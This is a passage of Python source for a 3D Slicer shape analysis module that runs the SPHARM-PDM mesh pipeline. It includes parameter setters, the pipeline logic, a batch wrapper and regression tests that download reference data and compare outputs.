def setRescaleSegPostProcess(self, flag):
self.RescaleSegPostProcess = flag
def setSx(self, value):
self.sx = value
def setSy(self, value):
self.sy = value
def setSz(self, value):
self.sz = value
def setLabelNumber(self, value):
self.labelNumber = value
def setOverwriteGenParaMesh(self, flag):
self.OverwriteGenParaMesh = flag
def setNumberofIterations(self, value):
self.NumberofIterations = value
def setOverwriteParaToSPHARMMesh(self, flag):
self.OverwriteParaToSPHARMMesh = flag
def setSubdivLevelValue(self, value):
self.SubdivLevelValue = value
def setSPHARMDegreeValue(self, value):
self.SPHARMDegreeValue = value
def setThetaIterationValue(self, value):
self.thetaIterationValue = value
def setPhiIterationValue(self, value):
self.phiIterationValue = value
def setMedialMesh(self, flag):
self.medialMesh = flag
def setTableForChoiceOfFlip(self, table):
self.tableWidget_ChoiceOfFlip = table
def setGaussianFiltering(self, flag):
self.GaussianFiltering = flag
def setVarianceX(self, value):
self.VarianceX = value
def setVarianceY(self, value):
self.VarianceY = value
def setVarianceZ(self, value):
self.VarianceZ = value
def setUseRegTemplate(self, flag):
self.useRegTemplate = flag
def setRegTemplate(self, path):
self.regTemplate = path
def setUseFlipTemplate(self, flag):
self.useFlipTemplate = flag
def setFlipTemplate(self, path):
self.flipTemplate = path
def setChoiceOfFlip(self, value):
self.choiceOfFlip = value
def setSameFlipForAll(self, flag):
self.sameFlipForAll = flag
def setFiducialsDirectory(self, directory):
self.fiducialsDirectory = directory
def setRigidAlignmentEnabled(self, enabled):
self.rigidAlignmentEnabled = enabled
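# Illustrative sketch (not part of the module): the parameters object can be
# configured programmatically, as ShapeAnalysisModuleWrapper does further below.
# The paths are hypothetical placeholders.
#   params = ShapeAnalysisModuleParameters()
#   params.setInputDirectory('/path/to/labelmaps')
#   params.setOutputDirectory('/path/to/output')
#   params.setRescaleSegPostProcess(True)
#   params.setSx(0.5); params.setSy(0.5); params.setSz(0.5)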
#
# ShapeAnalysisModuleLogic
#
class ShapeAnalysisModuleLogic(LogicMixin):
"""
Uses ScriptedLoadableModuleLogic base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def __init__(self):
LogicMixin.__init__(self, "ShapeAnalysisModule")
self.parameters = ShapeAnalysisModuleParameters()
def ShapeAnalysisCases(self):
# No cases
if not self.InputCases:
inputDirectory = self.parameters.inputDirectory
self.ErrorMessage = "No cases found in " + inputDirectory
self.Node.SetStatus(self.Node.CompletedWithErrors)
return -1
# Create pipelines
else:
logging.info('%d case(s) found', len(self.InputCases))
# Init
for i in range(len(self.InputCases)):
self.completed[i] = False
self.pipeline[i] = ShapeAnalysisModulePipeline(i, self.InputCases[i], self.parameters)
self.addObserver(self.pipeline[i].Node, slicer.vtkMRMLCommandLineModuleNode().StatusModifiedEvent,
self.onPipelineModified)
# Logic ready
self.Node.SetStatus(self.Node.Running)
# Launch Workflow
self.startPipeline(0)
return 0
# Empty the output folders if the overwrite option is checked
def cleanOutputFolders(self):
outputDirectory = self.parameters.outputDirectory
if self.parameters.OverwriteSegPostProcess:
PostProcessOutputDirectory = outputDirectory + "/Step1_SegPostProcess"
if os.path.exists(PostProcessOutputDirectory):
for filename in os.listdir(PostProcessOutputDirectory):
os.remove(os.path.join(PostProcessOutputDirectory, filename))
if self.parameters.OverwriteGenParaMesh:
GenParaMeshOutputDirectory = outputDirectory + "/Step2_GenParaMesh"
if os.path.exists(GenParaMeshOutputDirectory):
for filename in os.listdir(GenParaMeshOutputDirectory):
os.remove(os.path.join(GenParaMeshOutputDirectory, filename))
if self.parameters.OverwriteParaToSPHARMMesh:
SPHARMMeshOutputDirectory = outputDirectory + "/Step3_ParaToSPHARMMesh"
if os.path.exists(SPHARMMeshOutputDirectory):
for filename in os.listdir(SPHARMMeshOutputDirectory):
os.remove(os.path.join(SPHARMMeshOutputDirectory, filename))
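# For reference, the per-step output tree handled above (rootnames illustrative):
#   <outputDirectory>/Step1_SegPostProcess/<case>_pp.nrrd
#   <outputDirectory>/Step2_GenParaMesh/<case>_pp_para.vtk and <case>_pp_surf.vtk
#   <outputDirectory>/Step3_ParaToSPHARMMesh/<case>_pp_surf_SPHARM*.vtk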
# Function to create a CSV file containing all the SPHARM mesh output files
# that the user wants to display in ShapePopulationViewer
def creationCSVFileForSPV(self, table, filepathCSV):
# Creation of a CSV file with a header 'VTK Files'
csvFile = open(filepathCSV, 'w')
cw = csv.writer(csvFile, delimiter=',')
cw.writerow(['VTK Files'])
# Add the filepath of the vtk file checked in the table
outputDirectory = self.parameters.outputDirectory
SPHARMMeshOutputDirectory = outputDirectory + "/Step3_ParaToSPHARMMesh/"
# Add the path of each vtk file the user selected
for row in range(0, table.rowCount):
# Check the state of the checkbox
widget = table.cellWidget(row, 1)
children = widget.children()
checkBox = children[1]
if checkBox.isChecked():
# Recovery of the vtk filename
qlabel = table.cellWidget(row, 0)
vtkRootname = qlabel.text
VTKfilepath = SPHARMMeshOutputDirectory + vtkRootname + ".vtk"
if os.path.exists(VTKfilepath):
cw.writerow([VTKfilepath])
csvFile.close()
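# The generated CSV looks like this (paths illustrative):
#   VTK Files
#   .../Step3_ParaToSPHARMMesh/case01_pp_surf_SPHARM.vtk
#   .../Step3_ParaToSPHARMMesh/case01_pp_surf_SPHARM_ellalign.vtk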
# Function to conditionally invoke RigidAlignment module to improve correspondence
def improveCorrespondence(self):
if self.parameters.rigidAlignmentEnabled:
logging.info("Invoking RigidAlignment...")
fidsDir = Path(self.parameters.fiducialsDirectory)
outDir = Path(self.parameters.outputDirectory)
inDir = outDir / 'Step3_ParaToSPHARMMesh'
outModelsDir = outDir / 'Step4_Improvement' / 'models'
outSphereDir = outDir / 'Step4_Improvement' / 'sphere'
os.makedirs(outModelsDir, exist_ok=True)
os.makedirs(outSphereDir, exist_ok=True)
models = inDir.glob('*_pp_surf_SPHARM.vtk')
fiducials = fidsDir.glob('*_fid.fcsv')
unitSphere = next(inDir.glob('*_surf_para.vtk'))
logic = RigidAlignmentModuleLogic()
logic.run(
models=models,
fiducials=fiducials,
unitSphere=unitSphere,
outModelsDir=outModelsDir,
outSphereDir=outSphereDir,
)
else:
logging.info("RigidAlignment not enabled; Skipping.")
#
# ShapeAnalysisModulePipeline
#
class ShapeAnalysisModulePipeline(PipelineMixin):
def __init__(self, pipelineID, CaseInput, interface):
PipelineMixin.__init__(self, pipelineID, CaseInput, interface)
self.interface = interface
def setupSkipCLIs(self):
self.skip_meshToLabelMap = False
self.skip_segPostProcess = False
self.skip_genParaMesh = False
self.skip_paraToSPHARMMesh = False
outputDirectory = self.interface.outputDirectory
# Skip MeshToLabelMap?
if not self.inputExtension == "vtk" and not self.inputExtension == "vtp":
self.skip_meshToLabelMap = True
else:
MeshToLabelMapOutputDirectory = outputDirectory + "/Step0_MeshToLabelMap"
MeshToLabelMapOutputFilepath = MeshToLabelMapOutputDirectory + "/" + self.inputRootname + ".nrrd"
if os.path.exists(MeshToLabelMapOutputFilepath):
self.inputExtension = "nrrd"
self.skip_meshToLabelMap = True
# If MeshToLabelMap is not skipped, do not skip the next CLIs: SegPostProcess, GenParaMesh and ParaToSPHARMMesh
if not self.skip_meshToLabelMap:
return
# Skip SegPostProcess ?
if not self.interface.OverwriteSegPostProcess:
PostProcessOutputDirectory = outputDirectory + "/Step1_SegPostProcess"
PostProcessOutputFilepath = PostProcessOutputDirectory + "/" + self.inputRootname + "_pp.nrrd"
if os.path.exists(PostProcessOutputFilepath):
self.skip_segPostProcess = True
# If SegPostProcess is not skipped, do not skip the next CLIs: GenParaMesh and ParaToSPHARMMesh
if not self.skip_segPostProcess:
return
# Skip GenParaMesh ?
if not self.interface.OverwriteGenParaMesh:
GenParaMeshOutputDirectory = outputDirectory + "/Step2_GenParaMesh"
ParaOutputFilepath = GenParaMeshOutputDirectory + "/" + self.inputRootname + "_pp_para.vtk"
SurfOutputFilepath = GenParaMeshOutputDirectory + "/" + self.inputRootname + "_pp_surf.vtk"
if os.path.exists(ParaOutputFilepath) and os.path.exists(SurfOutputFilepath):
self.skip_genParaMesh = True
# If GenParaMesh is not skipped, do not skip the next CLI: ParaToSPHARMMesh
if not self.skip_genParaMesh:
return
# Skip ParaToSPHARMMesh ?
if not self.interface.OverwriteParaToSPHARMMesh:
SPHARMMeshOutputDirectory = outputDirectory + "/Step3_ParaToSPHARMMesh"
SPHARMMeshRootname = self.inputRootname + "_pp_surf"
if os.path.exists(SPHARMMeshOutputDirectory):
for file in os.listdir(SPHARMMeshOutputDirectory):
if not file.find(SPHARMMeshRootname) == -1:
self.skip_paraToSPHARMMesh = True
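# Summary of the skip decisions above (when the overwrite options are off):
#   MeshToLabelMap    runs only for mesh inputs (.vtk/.vtp) without an existing <case>.nrrd
#   SegPostProcess    skipped if <case>_pp.nrrd already exists
#   GenParaMesh       skipped if <case>_pp_para.vtk and <case>_pp_surf.vtk already exist
#   ParaToSPHARMMesh  skipped if any <case>_pp_surf* file already exists
# A step that does run forces all later steps to run as well.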
def setup(self):
# Initialization of global variables
self.setupGlobalVariables()
self.setupSkipCLIs()
inputDirectory = self.interface.inputDirectory
outputDirectory = self.interface.outputDirectory
## Mesh To Label Map: Transform the model into a label map
cli_nodes = list() # list of the nodes used in the Mesh to Label Map step
cli_dirnames = list() # list of the directory paths where the nodes used in the Mesh to Label Map step are stored
MeshToLabelMapOutputDirectory = outputDirectory + "/Step0_MeshToLabelMap"
MeshToLabelMapOutputFilename = self.inputRootname + ".nrrd"
MeshToLabelMapOutputFilepath = os.path.join(MeshToLabelMapOutputDirectory, MeshToLabelMapOutputFilename)
if not self.skip_meshToLabelMap:
# Setup of the parameters of the CLI
self.ID += 1
cli_parameters = {}
model_input_node = MRMLUtility.loadMRMLNode(self.inputRootname, inputDirectory, self.CaseInput, 'ModelFile')
cli_parameters["mesh"] = model_input_node
meshtolabelmap_output_node = MRMLUtility.createNewMRMLNode(self.inputRootname, slicer.vtkMRMLLabelMapVolumeNode())
cli_parameters["labelMap"] = meshtolabelmap_output_node
cli_parameters["spacingVec"] = "0.1,0.1,0.1"
self.inputExtension = "nrrd"
self.setupModule(slicer.modules.meshtolabelmap, cli_parameters)
# Setup of the nodes created by the CLI
# Creation of a folder in the output folder : Step0_MeshToLabelMap
if not os.path.exists(MeshToLabelMapOutputDirectory):
os.makedirs(MeshToLabelMapOutputDirectory)
cli_nodes.append(model_input_node)
cli_nodes.append(meshtolabelmap_output_node)
cli_dirnames.append(inputDirectory)
cli_dirnames.append(MeshToLabelMapOutputDirectory)
self.setupNode(0, cli_nodes, cli_dirnames, [False, True], [True, True])
else:
if os.path.exists(MeshToLabelMapOutputFilepath):
# Setup of the nodes which will be used by the next CLI
meshtolabelmap_output_node = MRMLUtility.loadMRMLNode(self.inputRootname, MeshToLabelMapOutputDirectory, MeshToLabelMapOutputFilename, 'LabelMap')
cli_nodes.append(meshtolabelmap_output_node)
cli_dirnames.append(MeshToLabelMapOutputDirectory)
self.setupNode(0, cli_nodes, cli_dirnames, [False], [True])
## Post Processed Segmentation
cli_nodes = list() # list of the nodes used in the Post Processed Segmentation step
cli_dirnames = list() # list of the directory paths where the nodes used in the Post Processed Segmentation step are stored
PostProcessOutputDirectory = outputDirectory + "/Step1_SegPostProcess"
PostProcessOutputRootname = self.inputRootname + "_pp"
PostProcessOutputFilename = self.inputRootname + "_pp.nrrd"
if not self.skip_segPostProcess:
# Setup of the parameters of the CLI
self.ID += 1
cli_parameters = {}
# IF Mesh To Label Map has been skipped AND the input given was already a label map
if self.skip_meshToLabelMap and not os.path.exists(MeshToLabelMapOutputFilepath):
PostProcessInputDirectory = inputDirectory
labelmap_input_node = MRMLUtility.loadMRMLNode(self.inputRootname, inputDirectory, self.CaseInput, 'LabelMap')
# ELSE the input given was a model which has been transformed by MeshToLabelMap and stored in the folder Step0_MeshToLabelMap
else:
labelmap_input_node = meshtolabelmap_output_node
PostProcessInputDirectory = MeshToLabelMapOutputDirectory
cli_parameters["fileName"] = labelmap_input_node
pp_output_node = MRMLUtility.createNewMRMLNode(PostProcessOutputRootname, slicer.vtkMRMLLabelMapVolumeNode())
cli_parameters["outfileName"] = pp_output_node.GetID()
if self.interface.RescaleSegPostProcess:
cli_parameters["scaleOn"] = True
cli_parameters["spacing_vect"] = str(self.interface.sx) + "," + str(self.interface.sy) + "," + str(self.interface.sz)
cli_parameters["label"] = self.interface.labelNumber
if self.interface.debug:
cli_parameters["debug"] = True
# Advanced parameters
if self.interface.GaussianFiltering:
cli_parameters["gaussianOn"] = True
cli_parameters["variance_vect"] = str(self.interface.VarianceX) + "," + str(self.interface.VarianceY) + "," + str(self.interface.VarianceZ)
self.setupModule(slicer.modules.segpostprocessclp, cli_parameters)
# Setup of the nodes created by the CLI
# Creation of a folder in the output folder : Step1_SegPostProcess
if not os.path.exists(PostProcessOutputDirectory):
os.makedirs(PostProcessOutputDirectory)
cli_nodes.append(labelmap_input_node)
cli_nodes.append(pp_output_node)
cli_dirnames.append(PostProcessInputDirectory)
cli_dirnames.append(PostProcessOutputDirectory)
self.setupNode(1, cli_nodes, cli_dirnames, [False,True], [True,True])
else:
# Setup of the nodes which will be used by the next CLI
pp_output_node = MRMLUtility.loadMRMLNode(PostProcessOutputRootname, PostProcessOutputDirectory, PostProcessOutputFilename, 'LabelMap')
cli_nodes.append(pp_output_node)
cli_dirnames.append(PostProcessOutputDirectory)
self.setupNode(1, cli_nodes, cli_dirnames, [False], [True])
## Generate Mesh Parameters
cli_nodes = list() # list of the nodes used in the Generate Mesh Parameters step
cli_dirnames = list() # list of the directory paths where the nodes used in the Generate Mesh Parameters step are stored
GenParaMeshOutputDirectory = outputDirectory + "/Step2_GenParaMesh"
GenParaMeshOutputParaRootname = PostProcessOutputRootname + "_para"
GenParaMeshOutputSurfRootname = PostProcessOutputRootname + "_surf"
GenParaMeshOutputParaFilename = PostProcessOutputRootname + "_para.vtk"
GenParaMeshOutputSurfFilename = PostProcessOutputRootname + "_surf.vtk"
if not self.skip_genParaMesh:
# Setup of the parameters of the CLI
self.ID += 1
cli_parameters = {}
cli_parameters["infile"] = pp_output_node
para_output_model = MRMLUtility.createNewMRMLNode(GenParaMeshOutputParaRootname, slicer.vtkMRMLModelNode())
cli_parameters["outParaName"] = para_output_model
surfmesh_output_model = MRMLUtility.createNewMRMLNode(GenParaMeshOutputSurfRootname, slicer.vtkMRMLModelNode())
cli_parameters["outSurfName"] = surfmesh_output_model
cli_parameters["numIterations"] = self.interface.NumberofIterations
if self.interface.debug:
cli_parameters["debug"] = True
self.setupModule(slicer.modules.genparameshclp, cli_parameters)
# Setup of the nodes created by the CLI
# Creation of a folder in the output folder : Step2_GenParaMesh
if not os.path.exists(GenParaMeshOutputDirectory):
os.makedirs(GenParaMeshOutputDirectory)
cli_nodes.append(para_output_model)
cli_nodes.append(surfmesh_output_model)
cli_dirnames.append(GenParaMeshOutputDirectory)
cli_dirnames.append(GenParaMeshOutputDirectory)
self.setupNode(2, cli_nodes, cli_dirnames, [True,True], [True,True])
else:
# Setup of the nodes which will be used by the next CLI
para_output_model = MRMLUtility.loadMRMLNode(GenParaMeshOutputParaRootname, GenParaMeshOutputDirectory, GenParaMeshOutputParaFilename, 'ModelFile')
surfmesh_output_model = MRMLUtility.loadMRMLNode(GenParaMeshOutputSurfRootname, GenParaMeshOutputDirectory, GenParaMeshOutputSurfFilename, 'ModelFile')
cli_nodes.append(para_output_model)
cli_nodes.append(surfmesh_output_model)
cli_dirnames.append(GenParaMeshOutputDirectory)
cli_dirnames.append(GenParaMeshOutputDirectory)
self.setupNode(2, cli_nodes, cli_dirnames, [False, False], [True, True])
## Parameters to SPHARM Mesh
cli_nodes = list() # list of the nodes used in the Parameters To SPHARM Mesh step
cli_dirnames = list() # list of the directory paths where the nodes used in the Parameters To SPHARM Mesh step are stored
SPHARMMeshOutputDirectory = outputDirectory + "/Step3_ParaToSPHARMMesh"
if not self.skip_paraToSPHARMMesh:
# Search of the flip to apply:
# 1 = flip along axes of x & y,
# 2 = flip along y & z,
# 3 = flip along x & z
# 4 = flip along x,
# 5 = flip along y,
# 6 = flip along x & y & z,
# 7 = flip along z where y is the smallest, x is the second smallest and z is the long axis of the ellipsoid
# 8 = All the flips
if not self.interface.sameFlipForAll:
# Recovery of the flip chosen by the user
row = self.pipelineID
widget = self.interface.tableWidget_ChoiceOfFlip.cellWidget(row, 1)
children = widget.children()
comboBox = children[1]
flipIndexToApply = comboBox.currentIndex
else:
flipIndexToApply = self.interface.choiceOfFlip
# Only one flip to apply
if flipIndexToApply < 8:
flipIndexes = [1]
# All the flips to apply
else:
flipIndexes = list(range(1, 8))
for i in flipIndexes:
# Setup of the parameters of the CLI
self.ID += 1
cli_parameters = {}
cli_parameters["inParaFile"] = para_output_model
cli_parameters["inSurfFile"] = surfmesh_output_model
# Creation of a folder in the output folder : Step3_ParaToSPHARMMesh
if not os.path.exists(SPHARMMeshOutputDirectory):
os.makedirs(SPHARMMeshOutputDirectory)
if flipIndexToApply < 8:
SPHARMMeshRootname = SPHARMMeshOutputDirectory + "/" + GenParaMeshOutputSurfRootname
cli_parameters["outbase"] = SPHARMMeshRootname
# For each flip creation of an output filename
else:
flipName = ['AlongXY', 'AlongYZ', 'AlongXZ', 'AlongX', 'AlongY', 'AlongXYZ', 'AlongZ']
SPHARMMeshRootname = SPHARMMeshOutputDirectory + "/" + self.inputRootname + "_flip" + flipName[i - 1] + "_pp_surf"
cli_parameters["outbase"] = SPHARMMeshRootname
cli_parameters["subdivLevel"] = self.interface.SubdivLevelValue
cli_parameters["spharmDegree"] = self.interface.SPHARMDegreeValue
cli_parameters["thetaIteration"] = self.interface.thetaIterationValue
cli_parameters["phiIteration"] = self.interface.phiIterationValue
if self.interface.medialMesh:
cli_parameters["medialMesh"] = True
if self.interface.debug:
cli_parameters["debug"] = True
# Advanced parameters
if self.interface.useRegTemplate:
cli_parameters["regTemplateFileOn"] = True
regtemplate_filepath = self.interface.regTemplate
regtemplate_dir = os.path.split(regtemplate_filepath)[0]
regtemplate_rootname = os.path.split(regtemplate_filepath)[1].split(".")[0]
regtemplate_filename = os.path.split(regtemplate_filepath)[1]
regtemplate_model = MRMLUtility.loadMRMLNode(regtemplate_rootname, regtemplate_dir, regtemplate_filename, 'ModelFile')
cli_parameters["regTemplateFile"] = regtemplate_model
cli_nodes.append(regtemplate_model)
cli_dirnames.append(regtemplate_filepath)
self.setupNode(i + 2, cli_nodes, cli_dirnames, [False], [True])
if self.interface.useFlipTemplate:
cli_parameters["flipTemplateFileOn"] = True
cli_parameters["flipTemplateFile"] = self.interface.flipTemplate
if flipIndexToApply < 8:
cli_parameters["finalFlipIndex"] = flipIndexToApply
else:
cli_parameters["finalFlipIndex"] = i
self.setupModule(slicer.modules.paratospharmmeshclp, cli_parameters)
class ShapeAnalysisModuleWrapper(object):
"""
This class should be called from an external python script to run the SPHARM-PDM method on multiple cases using SlicerSALT or 3D Slicer.
External python script (ex: SPHARM-PDM.py) should do the following:
from ShapeAnalysisModule import ShapeAnalysisModuleWrapper
from ConfigParser import SafeConfigParser
parser = SafeConfigParser()
parser.read(sys.argv[1]) #argv[1]: 'path/to/SPHARM-PDM-parameters.ini'
inputDirectoryPath = parser.get('section', 'input-directory-path')
[...]
ShapeAnalysisModuleInstance = ShapeAnalysisModuleWrapper(inputDirectoryPath, outputDirectoryPath, [...])
ShapeAnalysisModuleInstance.startProcessing()
The external python script can be run non-interactively using this command:
./SlicerSalt --no-main-window --python-script /path/to/SPHARM-PDM.py path/to/SPHARM-PDM-parameters.ini
"""
def __init__(self, inputDirectoryPath, outputDirectoryPath,
RescaleSegPostProcess, sx, sy, sz, labelNumber,
GaussianFiltering, VarianceX, VarianceY, VarianceZ,
numberofIterations,
SubdivLevelValue, SPHARMDegreeValue,
medialMesh, thetaIterationValue, phiIterationValue,
useRegTemplate, regTemplate,
useFlipTemplate, flipTemplate, choiceOfFlip):
self.Logic = ShapeAnalysisModuleLogic()
self.Logic.parameters.setWaitForCompletion(True)
self.Logic.parameters.setInputDirectory(inputDirectoryPath)
self.Logic.parameters.setOutputDirectory(outputDirectoryPath)
self.Logic.parameters.setRescaleSegPostProcess(RescaleSegPostProcess)
self.Logic.parameters.setSx(sx)
self.Logic.parameters.setSy(sy)
self.Logic.parameters.setSz(sz)
self.Logic.parameters.setLabelNumber(labelNumber)
self.Logic.parameters.setGaussianFiltering(GaussianFiltering)
self.Logic.parameters.setVarianceX(VarianceX)
self.Logic.parameters.setVarianceY(VarianceY)
self.Logic.parameters.setVarianceZ(VarianceZ)
self.Logic.parameters.setNumberofIterations(numberofIterations)
self.Logic.parameters.setSubdivLevelValue(SubdivLevelValue)
self.Logic.parameters.setSPHARMDegreeValue(SPHARMDegreeValue)
self.Logic.parameters.setMedialMesh(medialMesh)
self.Logic.parameters.setThetaIterationValue(thetaIterationValue)
self.Logic.parameters.setPhiIterationValue(phiIterationValue)
self.Logic.parameters.setUseRegTemplate(useRegTemplate)
self.Logic.parameters.setRegTemplate(regTemplate)
self.Logic.parameters.setUseFlipTemplate(useFlipTemplate)
self.Logic.parameters.setFlipTemplate(flipTemplate)
self.Logic.parameters.setChoiceOfFlip(choiceOfFlip)
def startProcessing(self):
# Setup the inputCases
# Possible extensions
exts = [".gipl", ".gipl.gz", ".mgh", ".mgh,gz", ".nii", ".nii.gz",".nrrd", ".vtk", ".vtp", ".hdr", ".mhd"]
# Search cases and add the filename to a list
self.Logic.InputCases = []
for file in os.listdir(self.Logic.parameters.inputDirectory):
for ext in exts:
if file.endswith(ext):
self.Logic.InputCases.append(file)
self.Logic.ShapeAnalysisCases()
class ShapeAnalysisModuleTest(ScriptedLoadableModuleTest):
"""
This is the test case for your scripted module.
Uses ScriptedLoadableModuleTest base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def setUp(self):
slicer.mrmlScene.Clear(0)
self.inputRootnames = list()
def runTest(self):
self.setUp()
self.delayDisplay('Starting the tests')
self.test_ShapeAnalysisModule_completedWithoutErrors()
def test_ShapeAnalysisModule_completedWithoutErrors(self):
self.delayDisplay('Test 1: Run Shape Analysis Module')
self.Logic = ShapeAnalysisModuleLogic()
# Creation of input folder
inputDirectoryPath = slicer.app.temporaryPath + '/InputShapeAnalysisModule'
if not os.path.exists(inputDirectoryPath):
os.makedirs(inputDirectoryPath)
# Download the label map in the input folder
input_downloads = (
('https://data.kitware.com/api/v1/file/59945eb38d777f7d33e9c3c4/download', 'InputImage.gipl'),
)
for i in range(len(input_downloads)):
self.inputRootnames.append(input_downloads[i][1].split(".")[0])
self.download_files(inputDirectoryPath, input_downloads)
# Creation of output folder
outputDirectoryPath = slicer.app.temporaryPath + '/OutputShapeAnalysisModule'
if not os.path.exists(outputDirectoryPath):
os.makedirs(outputDirectoryPath)
# Creation of a template folder
templateDirectoryPath = slicer.app.temporaryPath + '/TemplateShapeAnalysisModule'
if not os.path.exists(templateDirectoryPath):
os.makedirs(templateDirectoryPath)
else:
for filename in os.listdir(templateDirectoryPath):
os.remove(os.path.join(templateDirectoryPath, filename))
# Download the registration template in the template folder
template_downloads = (
('https://data.kitware.com/api/v1/file/599462f78d777f7d33e9c3e6/download', 'RegistrationTemplateForParaToSPHARMMesh.vtk'),
)
self.download_files(templateDirectoryPath, template_downloads)
#
# Inputs of Shape Analysis Module
#
self.Logic.parameters.setWaitForCompletion(True)
self.Logic.parameters.setInputDirectory(inputDirectoryPath)
self.Logic.parameters.setOutputDirectory(outputDirectoryPath)
self.Logic.parameters.setOverwriteSegPostProcess(True)
self.Logic.parameters.setOverwriteGenParaMesh(True)
self.Logic.parameters.setNumberofIterations(25)
self.Logic.parameters.setOverwriteParaToSPHARMMesh(True)
self.Logic.parameters.setMedialMesh(True)
self.Logic.parameters.setUseRegTemplate(True)
regTemplateFilePath = templateDirectoryPath + '/RegistrationTemplateForParaToSPHARMMesh.vtk'
self.Logic.parameters.setChoiceOfFlip(3)
self.Logic.parameters.setRegTemplate(regTemplateFilePath)
# Setup the inputCases
# Possible extensions
exts = [".gipl", ".gipl.gz", ".mgh", ".mgh,gz", ".nii", ".nii.gz",".nrrd", ".vtk", ".vtp", ".hdr", ".mhd"]
# Search cases and add the filename to a list
self.Logic.InputCases = []
for file in os.listdir(inputDirectoryPath):
for ext in exts:
if file.endswith(ext):
self.Logic.InputCases.append(file)
self.delayDisplay('Run Shape Analysis Module')
self.Logic.ShapeAnalysisCases()
self.assertTrue(self.comparisonOfOutputsSegPostProcess())
self.assertTrue(self.comparisonOfOutputsGenParaMesh())
self.assertTrue(self.comparisonOfOutputsParaToSPHARMMesh())
self.cleanSlicerTemporaryDirectory()
self.delayDisplay('Tests Passed!')
slicer.mrmlScene.Clear(0)
def comparisonOfOutputsSegPostProcess(self):
self.delayDisplay('Test 2: Comparison of the outputs generated by SegPostProcess CLI')
# Checking the existence of the output directory Step1_SegPostProcess
outputDirectoryPath = slicer.app.temporaryPath + '/OutputShapeAnalysisModule'
SegPostProcessOutputDirectoryPath = outputDirectoryPath + '/Step1_SegPostProcess'
if not os.path.exists(SegPostProcessOutputDirectoryPath):
return False
# Downloading output data to compare with the ones generated by Shape Analysis Module during the tests
output_downloads = (
('https://data.kitware.com/api/v1/file/59945ee08d777f7d33e9c3d3/download', 'OutputImageToCompareSegPostProcess.nrrd'),
)
self.download_files(SegPostProcessOutputDirectoryPath, output_downloads)
# Comparison of the Post Process Mesh Outputs
self.delayDisplay('Comparison of the Post Process Outputs')
output_filenames = list()
for inputRootname in self.inputRootnames:
output_filename = inputRootname + "_pp.nrrd"
output_filenames.append(output_filename)
for i in range(len(output_filenames)):
volume2_filepath = os.path.join(SegPostProcessOutputDirectoryPath, output_filenames[i])
# Checking the existence of the output files in the folder Step1_SegPostProcess
if not os.path.exists(volume2_filepath):
return False
# Loading the 2 volumes for comparison
volume1_rootname = output_filenames[i].split(".")[0]
volume2_rootname = output_downloads[i][1].split(".")[0]
volume1 = MRMLUtility.loadMRMLNode(volume1_rootname, SegPostProcessOutputDirectoryPath, output_downloads[i][1], 'LabelMap')
volume2 = MRMLUtility.loadMRMLNode(volume2_rootname, SegPostProcessOutputDirectoryPath, output_filenames[i], 'LabelMap')
# Comparison
if not self.volume_comparison(volume1, volume2):
return False
return True
def comparisonOfOutputsGenParaMesh(self):
self.delayDisplay('Test 3: Comparison of the outputs generated by GenParaMesh CLI')
# Checking the existence of the output directory Step2_GenParaMesh
outputDirectoryPath = slicer.app.temporaryPath + '/OutputShapeAnalysisModule'
GenParaMeshOutputDirectoryPath = outputDirectoryPath + '/Step2_GenParaMesh'
if not os.path.exists(GenParaMeshOutputDirectoryPath):
return False
# Downloading output data to compare with the ones generated by Shape Analysis Module during the tests
output_downloads = (
('https://data.kitware.com/api/v1/file/59af09588d777f7d33e9cf9d/download', 'OutputImageToCompareGenParaMesh_para.vtk'),
('https://data.kitware.com/api/v1/file/59945ece8d777f7d33e9c3c7/download', 'OutputImageToCompareGenParaMesh_surf.vtk'),
)
self.download_files(GenParaMeshOutputDirectoryPath, output_downloads)
# Comparison of the Parameters Mesh Outputs
self.delayDisplay('Comparison of the Parameters Mesh Outputs')
output_filenames = list()
for inputRootname in self.inputRootnames:
output_para_filename = inputRootname + "_pp_para.vtk"
output_surf_filename = inputRootname + "_pp_surf.vtk"
output_filenames.append(output_para_filename)
output_filenames.append(output_surf_filename)
for i in range(len(output_filenames)):
model2_filepath = os.path.join(GenParaMeshOutputDirectoryPath, output_filenames[i])
# Checking the existence of the output files in the folder Step2_GenParaMesh
if not os.path.exists(model2_filepath):
return False
# Loading the 2 models for comparison
model1_rootname = output_downloads[i][1].split(".")[0]
model2_rootname = output_filenames[i].split(".")[0]
model1 = MRMLUtility.loadMRMLNode(model1_rootname, GenParaMeshOutputDirectoryPath, output_downloads[i][1], 'ModelFile')
model2 = MRMLUtility.loadMRMLNode(model2_rootname, GenParaMeshOutputDirectoryPath, output_filenames[i], 'ModelFile')
# Comparison
if not self.polydata_comparison(model1, model2):
return False
return True
def comparisonOfOutputsParaToSPHARMMesh(self):
self.delayDisplay('Test 4: Comparison of the outputs generated by ParaToSPHARMMesh CLI')
# Checking the existence of the output directory Step3_ParaToSPHARMMesh
outputDirectoryPath = slicer.app.temporaryPath + '/OutputShapeAnalysisModule'
ParaToSPHARMMeshOutputDirectoryPath = outputDirectoryPath + '/Step3_ParaToSPHARMMesh'
if not os.path.exists(ParaToSPHARMMeshOutputDirectoryPath):
return False
# Downloading output data to compare with the ones generated by Shape Analysis Module during the tests
output_downloads = (
('https://data.kitware.com/api/v1/file/59af09028d777f7d33e9cf9a/download', 'OutputImageToCompareParaToSPHARMMesh_SPHARM.vtk'),
('https://data.kitware.com/api/v1/file/59af09018d777f7d33e9cf91/download', 'OutputImageToCompareParaToSPHARMMesh_SPHARM_ellalign.vtk'),
('https://data.kitware.com/api/v1/file/59af09018d777f7d33e9cf94/download', 'OutputImageToCompareParaToSPHARMMesh_MedialMesh.vtk'),
('https://data.kitware.com/api/v1/file/59af09028d777f7d33e9cf97/download', 'OutputImageToCompareParaToSPHARMMesh_SPHARM_procalign.vtk'),
)
self.download_files(ParaToSPHARMMeshOutputDirectoryPath, output_downloads)
# Comparison of the SPHARM Mesh Outputs
self.delayDisplay('Comparison of the SPHARM Mesh Outputs')
output_filenames = list()
for inputRootname in self.inputRootnames:
output_spharm_filename = inputRootname + "_pp_surf_SPHARM.vtk"
output_ellalign_filename = inputRootname + "_pp_surf_SPHARM_ellalign.vtk"
output_medialmesh_filename = inputRootname + "_pp_surf_SPHARMMedialMesh.vtk"
output_procalign_filename = inputRootname + "_pp_surf_SPHARM_procalign.vtk"
output_filenames.append(output_spharm_filename)
output_filenames.append(output_ellalign_filename)
